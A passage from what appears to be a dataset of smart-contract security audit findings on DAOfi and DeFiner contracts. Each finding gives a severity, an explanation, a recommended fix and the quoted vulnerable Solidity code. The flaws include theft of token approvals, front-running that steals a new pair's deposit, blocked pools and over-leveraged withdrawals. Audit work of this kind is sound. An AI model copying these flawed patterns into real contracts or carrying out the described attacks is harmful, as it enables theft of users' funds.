However, contracts currently executing their constructor will have an `extcodesize` of 0, and will not be able to use this method.\\nThis is unlikely to cause significant issues, but dForce may want to consider supporting this edge case.чUse `msg.sender != tx.origin` as a more reliable method to detect use by a contract.чч```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n \"receive: Only can call from a contract!\"\\n );\\n}\\n```\\n -Token approvals can be stolen in DAOfiV1Router01.addLiquidity()чhighч`DAOfiV1Router01.addLiquidity()` creates the desired pair contract if it does not already exist, then transfers tokens into the pair and calls `DAOfiV1Pair.deposit()`. There is no validation of the address to transfer tokens from, so an attacker could pass in any address with nonzero token approvals to `DAOfiV1Router`. This could be used to add liquidity to a pair contract for which the attacker is the `pairOwner`, allowing the stolen funds to be retrieved using `DAOfiV1Pair.withdraw()`.\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\nчTransfer tokens from `msg.sender` instead of `lp.sender`.чч```\\nfunction addLiquidity(\\n 
LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n -The deposit of a new pair can be stolenчhighчTo create a new pair, a user is expected to call the same `addLiquidity()` (or the addLiquidityETH()) function of the router contract seen above:\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n\\nThis function checks if the pair already exists and creates a new one if it does not. 
After that, the first and only deposit is made to that pair.\\nThe attacker can front-run that call and create a pair with the same parameters (thus, with the same address) by calling the `createPair` function of the `DAOfiV1Factory` contract. By calling that function directly, the attacker does not have to make the deposit when creating a new pair. The initial user will make this deposit, whose funds can now be withdrawn by the attacker.чThere are a few factors/bugs that allowed this attack. All or some of them should be fixed:\\nThe `createPair` function of the `DAOfiV1Factory` contract can be called directly by anyone without depositing with any `router` address as the parameter. The solution could be to allow only the `router` to create a pair.\\nThe `addLiquidity` function checks that the pair does not exist yet. If the pair exists already, a deposit should only be made by the owner of the pair. But in general, a new pair shouldn't be deployed without depositing in the same transaction.\\nThe pair's address does not depend on the owner/creator. 
It might make sense to add that information to the salt.чч```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n -Incorrect token decimal conversions can lead to loss of fundsчhighчThe `_convert()` function in `DAOfiV1Pair` is used to accommodate tokens with varying `decimals()` values. There are three cases in which it implicitly returns 0 for any `amount`, the most notable of which is when `token.decimals() == resolution`.\\nAs a result of this, `getQuoteOut()` reverts any time either `baseToken` or `quoteToken` have `decimals == INTERNAL_DECIMALS` (currently hardcoded to 8).\\n`getBaseOut()` also reverts in most cases when either `baseToken` or `quoteToken` have `decimals() == INTERNAL_DECIMALS`. The exception is when `getBaseOut()` is called while `supply` is 0, as is the case in `deposit()`. 
This causes `getBaseOut()` to succeed, returning an incorrect value.\\nThe result of this is that no swaps can be performed in one of these pools, and the `deposit()` function will return an incorrect `amountBaseOut` of `baseToken` to the depositor, the balance of which can then be withdrawn by the `pairOwner`.\\n```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\nчThe `_convert()` function should return `amount` when `token.decimals() == resolution`. 
Additionally, implicit return values should be avoided whenever possible, especially in functions that implement complex mathematical operations.\\n`BancorFormula.power(baseN, baseD, _, _)` does not support `baseN < baseD`, and checks should be added to ensure that any call to the `BancorFormula` conforms to the expected input ranges.чч```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\n -The swapExactTokensForETH checks the wrong return valueчhighчThe following lines are intended to check that the amount of tokens received from a swap is greater than the minimum amount expected from this swap (sp.amountOut):\\n```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n\\nInstead, it calculates the difference between the initial receiver's balance and the balance of the router.чCheck the intended value.чч```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n -DAOfiV1Pair.deposit() accepts deposits of zero, blocking the poolчmediumч`DAOfiV1Pair.deposit()` is used to deposit 
liquidity into the pool. Only a single deposit can be made, so no liquidity can ever be added to a pool where `deposited == true`. The `deposit()` function does not check for a nonzero deposit amount in either token, so a malicious user that does not hold any of the `baseToken` or `quoteToken` can lock the pool by calling `deposit()` without first transferring any funds to the pool.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\nчRequire a minimum deposit amount in both `baseToken` and `quoteToken`, and do not rely on any assumptions about the distribution of `baseToken` as part of the security model.чч```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = 
reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\n -Restricting DAOfiV1Pair functions to calls from router makes DAOfiV1Router01 security criticalчmediumчThe `DAOfiV1Pair` functions `deposit()`, `withdraw()`, and `swap()` are all restricted to calls from the router in order to avoid losses from user error. However, this means that any unidentified issue in the Router could render all pair contracts unusable, potentially locking the pair owner's funds.\\nAdditionally, `DAOfiV1Factory.createPair()` allows any nonzero address to be provided as the `router`, so pairs can be initialized with a malicious `router` that users would be forced to interact with to utilize the pair contract.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n\\n```\\nfunction withdraw(address to) external override lock returns (uint256 amountBase, uint256 amountQuote) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_WITHDRAW');\\n```\\n\\n```\\nfunction swap(address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, address to) external override lock {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_SWAP');\\n```\\nчDo not restrict `DAOfiV1Pair` functions to calls from `router`, but encourage users to use a trusted `router` to avoid losses from user error. 
If this restriction is kept, consider including the `router` address in the deployment salt for the pair or hardcoding the address of a trusted `router` in `DAOfiV1Factory` instead of taking the `router` as a parameter to `createPair()`.чч```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n -Pair contracts can be easily blockedчlowчThe parameters used to define a unique pair are the `baseToken`, `quoteToken`, `slopeNumerator`, `n`, and `fee`. There is only one accepted value for `n`, and there are eleven accepted values for `fee`. This makes the number of possible “interesting” pools for each token pair somewhat limited, and pools can be easily blocked by front-running deployments and depositing zero liquidity or immediately withdrawing deposited liquidity. Because liquidity can only be added once, these pools are permanently blocked.\\nThe existing mitigation for this issue is to create a new pool with slightly different parameters. This creates significant cost for the creator of a pair, forces them to deploy a pair with sub-optimal parameters, and could potentially block all interesting pools for a token pair.\\nThe salt used to determine unique pair contracts in DAOfiV1Factory.createPair():\\n```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\nчConsider adding additional parameters to the salt that defines a unique pair, such as the `pairOwner`. 
Modifying the parameters included in the salt can also be used to partially mitigate other security concerns raised in this report.чч```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\n -DAOfiV1Router01.removeLiquidityETH() does not support tokens with no return valueчlowчWhile the rest of the system uses the `safeTransfer*` pattern, allowing tokens that do not return a boolean value on `transfer()` or `transferFrom()`, `DAOfiV1Router01.removeLiquidityETH()` throws and consumes all remaining gas if the base token does not return `true`.\\nNote that the deposit in this case can still be withdrawn without unwrapping the Eth using `removeLiquidity()`.\\n```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\nчBe consistent with the use of `safeTransfer*`, and do not use `assert()` in cases where the condition can be false.чч```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair 
pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\n -Users can withdraw their funds immediately when they are over-leveragedчhighч`Accounts.withdraw` makes two checks before processing a withdrawal.\\nFirst, the method checks that the amount requested for withdrawal is not larger than the user's balance for the asset in question:\\n```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), \"Insufficient balance.\");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n\\nSecond, the method checks that the withdrawal will not over-leverage the user. The amount to be withdrawn is subtracted from the user's current “borrow power” at the current price. If the user's total value borrowed exceeds this new borrow power, the method fails, as the user no longer has sufficient collateral to support their borrow positions. 
However, this `require` is only checked if a user is not already over-leveraged:\\n```\\n// This if condition is to deal with the withdraw of collateral token in liquidation.\\n// As the amount if borrowed asset is already large than the borrow power, we don't\\n// have to check the condition here.\\nif(getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr))\\n require(\\n getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr).sub(\\n \\_amount.mul(globalConfig.tokenInfoRegistry().priceFromAddress(\\_token))\\n .mul(borrowLTV).div(Utils.getDivisor(address(globalConfig), \\_token)).div(100)\\n ), \"Insufficient collateral when withdraw.\");\\n```\\n\\nIf the user has already borrowed more than their “borrow power” allows, they are allowed to withdraw regardless. This case may arise in several circumstances; the most common being price fluctuation.чDisallow withdrawals if the user is already over-leveraged.\\nFrom the comment included in the code sample above, this condition is included to support the `liquidate` method, but its inclusion creates an attack vector that may allow users to withdraw when they should not be able to do so. Consider adding an additional method to support `liquidate`, so that users may not exit without repaying debts.чч```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), \"Insufficient balance.\");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n -Users can borrow funds, deposit them, then borrow more Won't FixчhighчUsers may deposit and borrow funds denominated in any asset supported by the `TokenRegistry`. 
Each time a user deposits or borrows a token, they earn FIN according to the difference in deposit / borrow rate indices maintained by `Bank`.\\nBorrowing funds\\nWhen users borrow funds, they may only borrow up to a certain amount: the user's “borrow power.” As long as the user is not requesting to borrow an amount that would cause their resulting borrowed asset value to exceed their available borrow power, the borrow is successful and the user receives the assets immediately. A user's borrow power is calculated in the following function:\\n```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n\\nFor each asset, borrow power is calculated from the user's deposit size, multiplied by the current chainlink price, multiplied and that asset's “borrow LTV.”\\nDepositing borrowed funds\\nAfter a user borrows tokens, they can then deposit those tokens, increasing their deposit balance for that asset. As a result, their borrow power increases, which allows the user to borrow again.\\nBy continuing to borrow, deposit, and borrow again, the user can repeatedly borrow assets. 
Essentially, this creates positions for the user where the collateral for their massive borrow position is entirely made up of borrowed assets.\\nConclusion\\nThere are several potential side-effects of this behavior.\\nFirst, as described in https://github.com/ConsenSys/definer-audit-2021-02/issues/3, the system is comprised of many different tokens, each of which is subject to price fluctuation. By borrowing and depositing repeatedly, a user may establish positions across all supported tokens. At this point, if price fluctuations cause the user's account to cross the liquidation threshold, their positions can be liquidated.\\nLiquidation is a complicated function of the protocol, but in essence, the liquidator purchases a target's collateral at a discount, and the resulting sale balances the account somewhat. However, when a user repeatedly deposits borrowed tokens, their collateral is made up of borrowed tokens: the system's liquidity! As a result, this may allow an attacker to intentionally create a massively over-leveraged account on purpose, liquidate it, and exit with a chunk of the system liquidity.\\nAnother potential problem with this behavior is FIN token mining. When users borrow and deposit, they earn FIN according to the size of the deposit / borrow, and the difference in deposit / borrow rate indices since the last deposit / borrow. By repeatedly depositing / borrowing, users are able to artificially deposit and borrow far more often than normal, which may allow them to generate FIN tokens at will. This additional strategy may make attacks like the one described above much more economically feasible.чDue to the limited time available during this engagement, these possibilities and potential mitigations were not fully explored. 
Definer is encouraged to investigate this behavior more carefully.чч```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n -Stale Oracle prices might affect the ratesчhighчIt's possible that due to network congestion or other reasons, the price that the ChainLink oracle returns is old and not up to date. This is more extreme in lesser known tokens that have fewer ChainLink Price feeds to update the price frequently. The codebase as is, relies on `chainLink().getLatestAnswer()` and does not check the timestamp of the price.\\n```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\nчDo a sanity check on the price returned from the oracle. 
If the price is older than a threshold, revert or handle in other means.чч```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\n -Overcomplicated unit conversionsчmediumчThere are many instances of unit conversion in the system that are implemented in a confusing way. This could result in mistakes in the conversion and possibly failure in correct accounting. It's been seen in the ecosystem that these type of complicated unit conversions could result in calculation mistake and loss of funds.\\nHere are a few examples:\\n```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n\\n```\\n compoundPool[\\_token].depositRatePerBlock = cTokenExchangeRate.mul(UNIT).div(lastCTokenExchangeRate[cToken])\\n .sub(UNIT).div(blockNumber.sub(lastCheckpoint[\\_token]));\\n```\\n\\n```\\n return lastDepositeRateIndex.mul(getBlockNumber().sub(lcp).mul(depositRatePerBlock).add(INT\\_UNIT)).div(INT\\_UNIT);\\n```\\nчSimplify the unit conversions in the system. 
This can be done either by using a function wrapper for units to convert all values to the same unit before including them in any calculation or by better documenting every line of unit conversionчч```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n -Commented out code in the codebaseчmediumчThere are many instances of code lines (and functions) that are commented out in the code base. Having commented out code increases the cognitive load on an already complex system. Also, it hides the important parts of the system that should get the proper attention, but that attention gets to be diluted.\\nThe main problem is that commented code adds confusion with no real benefit. 
Code should be code, and comments should be comments.\\nHere's a few examples of such lines of code, note that there are more.\\n```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n\\n```\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n```\\n\\nMany usage of `console.log()` and also the commented import on most of the contracts\\n```\\n // require(\\n // totalBorrow.mul(100) <= totalCollateral.mul(liquidationDiscountRatio),\\n // \"Collateral is not sufficient to be liquidated.\"\\n // );\\n```\\n\\n```\\n // function \\_isETH(address \\_token) public view returns (bool) {\\n // return globalConfig.constants().ETH\\_ADDR() == \\_token;\\n // }\\n\\n // function getDivisor(address \\_token) public view returns (uint256) {\\n // if(\\_isETH(\\_token)) return INT\\_UNIT;\\n // return 10 \\*\\* uint256(getTokenDecimals(\\_token));\\n // }\\n```\\n\\n```\\n // require(\\_borrowLTV != 0, \"Borrow LTV is zero\");\\n require(\\_borrowLTV < SCALE, \"Borrow LTV must be less than Scale\");\\n // require(liquidationThreshold > \\_borrowLTV, \"Liquidation threshold must be greater than Borrow LTV\");\\n```\\nчIn many of the above examples, it's not clear if the commented code is for testing or obsolete code (e.g. in the last example, can _borrowLTV ==0?) . 
All these instances should be reviewed and the system should be fully tested for all edge cases after the code changes.чч```\\n struct LiquidationVars {\\n // address token;\\n // uint256 tokenPrice;\\n // uint256 coinValue;\\n uint256 borrowerCollateralValue;\\n // uint256 tokenAmount;\\n // uint256 tokenDivisor;\\n uint256 msgTotalBorrow;\\n```\\n -Emergency withdrawal code presentчmediumчCode and functionality for emergency stop and withdrawal is present in this code base.\\n```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n\\n```\\n function emergencyWithdraw(address \\_token) external onlyEmergencyAddress {\\n SavingLib.emergencyWithdraw(globalConfig, \\_token);\\n }\\n```\\n\\n```\\n// rest of code\\n address payable public constant EMERGENCY\\_ADDR = 0xc04158f7dB6F9c9fFbD5593236a1a3D69F92167c;\\n// rest of code\\n```\\nчTo remove the emergency code and fully test all the affected contracts.чч```\\n // ============================================\\n // EMERGENCY WITHDRAWAL FUNCTIONS\\n // Needs to be removed when final version deployed\\n // ============================================\\n function emergencyWithdraw(GlobalConfig globalConfig, address \\_token) public {\\n address cToken = globalConfig.tokenInfoRegistry().getCToken(\\_token);\\n// rest of code\\n```\\n -Accounts contains expensive loopingчmediumч`Accounts.getBorrowETH` performs multiple external calls to `GlobalConfig` and `TokenRegistry` within a for loop:\\n```\\nfunction getBorrowETH(\\n address \\_accountAddr\\n) public view returns (uint256 borrowETH) {\\n uint tokenNum = globalConfig.tokenInfoRegistry().getCoinLength();\\n //console.log(\"tokenNum\", tokenNum);\\n 
for(uint i = 0; i < tokenNum; i++) {\\n if(isUserHasBorrows(\\_accountAddr, uint8(i))) {\\n address tokenAddress = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(tokenAddress != ETH\\_ADDR) {\\n divisor = 10 \\*\\* uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(tokenAddress));\\n }\\n borrowETH = borrowETH.add(getBorrowBalanceCurrent(tokenAddress, \\_accountAddr).mul(globalConfig.tokenInfoRegistry().priceFromIndex(i)).div(divisor));\\n }\\n }\\n return borrowETH;\\n}\\n```\\n\\nThe loop also makes additional external calls and delegatecalls from:\\nTokenRegistry.priceFromIndex:\\n```\\nfunction priceFromIndex(uint index) public view returns(uint256) {\\n require(index < tokens.length, \"coinIndex must be smaller than the coins length.\");\\n address tokenAddress = tokens[index];\\n // Temp fix\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n}\\n```\\n\\nAccounts.getBorrowBalanceCurrent:\\n```\\nfunction getBorrowBalanceCurrent(\\n address \\_token,\\n address \\_accountAddr\\n) public view returns (uint256 borrowBalance) {\\n AccountTokenLib.TokenInfo storage tokenInfo = accounts[\\_accountAddr].tokenInfos[\\_token];\\n uint accruedRate;\\n if(tokenInfo.getBorrowPrincipal() == 0) {\\n return 0;\\n } else {\\n if(globalConfig.bank().borrowRateIndex(\\_token, 